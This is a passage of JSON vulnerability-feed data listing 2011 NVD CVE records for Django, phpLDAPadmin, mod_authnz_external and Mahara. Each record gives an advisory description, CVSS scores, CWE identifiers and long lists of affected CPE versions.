"cpe:2.3:a:djangoproject:django:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.96:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha1:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:38:35", "description": "django.contrib.sessions in Django before 1.2.7 and 1.3.x before 1.3.1, when session data is stored in the cache, uses the root namespace for both session identifiers and application-data keys, which allows remote attackers to modify a session by triggering use of a key that is equal to that session's identifier.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "cve", "title": "CVE-2011-4136", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4136"], "modified": "2018-01-18T02:29:00", "cpe": ["cpe:/a:djangoproject:django:0.96", "cpe:/a:djangoproject:django:1.1.0", "cpe:/a:djangoproject:django:1.2", "cpe:/a:djangoproject:django:1.2.6", "cpe:/a:djangoproject:django:1.2.3", "cpe:/a:djangoproject:django:1.0.1", "cpe:/a:djangoproject:django:1.3", "cpe:/a:djangoproject:django:1.2.4", "cpe:/a:djangoproject:django:1.1", "cpe:/a:djangoproject:django:1.2.1", "cpe:/a:djangoproject:django:1.0.2", "cpe:/a:djangoproject:django:0.91", "cpe:/a:djangoproject:django:1.1.2", "cpe:/a:djangoproject:django:1.2.5", "cpe:/a:djangoproject:django:0.95.1", "cpe:/a:djangoproject:django:0.95", "cpe:/a:djangoproject:django:1.0", "cpe:/a:djangoproject:django:1.2.2", "cpe:/a:djangoproject:django:1.1.3"], "id": "CVE-2011-4136", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4136", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:djangoproject:django:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.96:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha1:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:37:20", "description": "The masort function in lib/functions.php in phpLDAPadmin 1.2.x before 1.2.2 allows remote attackers to execute arbitrary PHP code via the orderby parameter (aka sortby variable) in a query_engine action to cmd.php, as exploited in the wild in October 2011.", "cvss3": {}, "published": "2011-11-02T17:55:00", "type": "cve", "title": "CVE-2011-4075", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4075"], "modified": "2020-11-09T13:30:00", "cpe": ["cpe:/a:phpldapadmin_project:phpldapadmin:1.2.1.1", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.2", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.4", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.3", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.5", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.1", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.1"], "id": "CVE-2011-4075", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4075", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:14:20", "description": "SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.", "cvss3": {}, "published": "2011-07-28T18:55:00", "type": "cve", "title": "CVE-2011-2688", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2688"], "modified": "2020-11-16T20:47:00", "cpe": ["cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:debian:debian_linux:6.0", "cpe:/a:mod_authnz_external_project:mod_authnz_external:3.2.5"], "id": "CVE-2011-2688", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2688", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:mod_authnz_external_project:mod_authnz_external:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:15:53", "description": "Multiple cross-site scripting (XSS) vulnerabilities in Mahara before 1.4.1 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) URI attributes and (2) the External Feed component, as demonstrated by the guid element in an RSS feed.", "cvss3": {}, "published": "2011-11-15T03:57:00", "type": "cve", "title": "CVE-2011-2771", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2771"], "modified": "2011-11-15T05:00:00", "cpe": ["cpe:/a:mahara:mahara:1.3.1", "cpe:/a:mahara:mahara:1.2.0", "cpe:/a:mahara:mahara:1.2.5", "cpe:/a:mahara:mahara:1.2.4", "cpe:/a:mahara:mahara:0.9.2", "cpe:/a:mahara:mahara:1.1.1", "cpe:/a:mahara:mahara:1.3.0", "cpe:/a:mahara:mahara:1.4.0", "cpe:/a:mahara:mahara:1.3.5", "cpe:/a:mahara:mahara:1.1.3", "cpe:/a:mahara:mahara:1.0.8", "cpe:/a:mahara:mahara:1.0.11", "cpe:/a:mahara:mahara:1.0.9", "cpe:/a:mahara:mahara:1.1.8", "cpe:/a:mahara:mahara:1.1.9", "cpe:/a:mahara:mahara:1.3.4", "cpe:/a:mahara:mahara:1.3.7", "cpe:/a:mahara:mahara:1.0.4", "cpe:/a:mahara:mahara:1.0.0", "cpe:/a:mahara:mahara:1.0.7", "cpe:/a:mahara:mahara:1.3.6", "cpe:/a:mahara:mahara:1.3.2", "cpe:/a:mahara:mahara:1.2.6", "cpe:/a:mahara:mahara:1.0.12", "cpe:/a:mahara:mahara:0.9.1", "cpe:/a:mahara:mahara:1.0.2", "cpe:/a:mahara:mahara:1.1.4", "cpe:/a:mahara:mahara:1.0.15", "cpe:/a:mahara:mahara:1.1.2", "cpe:/a:mahara:mahara:1.0.6", "cpe:/a:mahara:mahara:1.2.3", "cpe:/a:mahara:mahara:1.0.13", "cpe:/a:mahara:mahara:1.0.3", "cpe:/a:mahara:mahara:1.3.3", "cpe:/a:mahara:mahara:1.0.14", "cpe:/a:mahara:mahara:1.1", "cpe:/a:mahara:mahara:1.0.10", "cpe:/a:mahara:mahara:1.1.5", "cpe:/a:mahara:mahara:1.1.6", "cpe:/a:mahara:mahara:1.0.1", "cpe:/a:mahara:mahara:1.2.1", "cpe:/a:mahara:mahara:1.2.2", "cpe:/a:mahara:mahara:1.1.0", "cpe:/a:mahara:mahara:1.1.7", "cpe:/a:mahara:mahara:1.0.5", "cpe:/a:mahara:mahara:1.4", "cpe:/a:mahara:mahara:0.9.0"], "id": "CVE-2011-2771", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2771", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mahara:mahara:1.1.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:0.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:0.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:0.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:rc2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:15:55", "description": "Cross-site request forgery (CSRF) vulnerability in Mahara before 1.4.1 allows remote attackers to hijack the authentication of administrators for requests that add a user to an institution.", "cvss3": {}, "published": "2011-11-15T03:57:00", "type": "cve", "title": "CVE-2011-2773", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2773"], "modified": "2011-11-15T05:00:00", "cpe": ["cpe:/a:mahara:mahara:1.3.1", "cpe:/a:mahara:mahara:1.2.0", "cpe:/a:mahara:mahara:1.2.5", "cpe:/a:mahara:mahara:1.2.4", "cpe:/a:mahara:mahara:0.9.2", "cpe:/a:mahara:mahara:1.3.0", "cpe:/a:mahara:mahara:1.4.0", "cpe:/a:mahara:mahara:1.1.1", "cpe:/a:mahara:mahara:1.1.3", "cpe:/a:mahara:mahara:1.3.5", "cpe:/a:mahara:mahara:1.0.11", "cpe:/a:mahara:mahara:1.0.8", "cpe:/a:mahara:mahara:1.0.9", "cpe:/a:mahara:mahara:1.1.8", "cpe:/a:mahara:mahara:1.1.9", "cpe:/a:mahara:mahara:1.3.4", "cpe:/a:mahara:mahara:1.3.7", "cpe:/a:mahara:mahara:1.0.4", "cpe:/a:mahara:mahara:1.0.0", "cpe:/a:mahara:mahara:1.0.7", "cpe:/a:mahara:mahara:1.3.6", "cpe:/a:mahara:mahara:1.3.2", "cpe:/a:mahara:mahara:1.2.6", "cpe:/a:mahara:mahara:0.9.1", "cpe:/a:mahara:mahara:1.0.12", "cpe:/a:mahara:mahara:1.0.2", "cpe:/a:mahara:mahara:1.1.4", "cpe:/a:mahara:mahara:1.0.15", "cpe:/a:mahara:mahara:1.0.6", "cpe:/a:mahara:mahara:1.1.2", "cpe:/a:mahara:mahara:1.2.3", "cpe:/a:mahara:mahara:1.0.13", "cpe:/a:mahara:mahara:1.0.3", "cpe:/a:mahara:mahara:1.3.3", "cpe:/a:mahara:mahara:1.0.14", "cpe:/a:mahara:mahara:1.1", "cpe:/a:mahara:mahara:1.0.10", "cpe:/a:mahara:mahara:1.1.5", "cpe:/a:mahara:mahara:1.1.6", "cpe:/a:mahara:mahara:1.0.1", "cpe:/a:mahara:mahara:1.2.1", "cpe:/a:mahara:mahara:1.2.2", "cpe:/a:mahara:mahara:1.1.0", "cpe:/a:mahara:mahara:1.1.7", "cpe:/a:mahara:mahara:1.0.5", "cpe:/a:mahara:mahara:1.4", "cpe:/a:mahara:mahara:0.9.0"], "id": "CVE-2011-2773", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2773", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mahara:mahara:1.1.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:0.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:0.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:0.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:rc2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:38:35", "description": "The verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 relies on Python libraries that attempt access to an arbitrary URL with no timeout, which allows remote attackers to cause a denial of service (resource consumption) via a URL associated with (1) a slow response, (2) a completed TCP connection with no application data sent, or (3) a large amount of application data, a related issue to CVE-2011-1521.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "cve", "title": "CVE-2011-4137", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1521", "CVE-2011-4137"], "modified": "2018-01-18T02:29:00", "cpe": ["cpe:/a:djangoproject:django:0.96", "cpe:/a:djangoproject:django:1.1.0", "cpe:/a:djangoproject:django:1.2", "cpe:/a:djangoproject:django:1.2.6", "cpe:/a:djangoproject:django:1.2.3", "cpe:/a:djangoproject:django:1.0.1", "cpe:/a:djangoproject:django:1.3", "cpe:/a:djangoproject:django:1.2.4", "cpe:/a:djangoproject:django:1.1", "cpe:/a:djangoproject:django:1.2.1", "cpe:/a:djangoproject:django:1.0.2", "cpe:/a:djangoproject:django:0.91", "cpe:/a:djangoproject:django:1.1.2", "cpe:/a:djangoproject:django:1.2.5", "cpe:/a:djangoproject:django:0.95.1", "cpe:/a:djangoproject:django:0.95", "cpe:/a:djangoproject:django:1.0", "cpe:/a:djangoproject:django:1.2.2", "cpe:/a:djangoproject:django:1.1.3"], "id": "CVE-2011-4137", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4137", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:djangoproject:django:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.96:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha1:*:*:*:*:*:*", 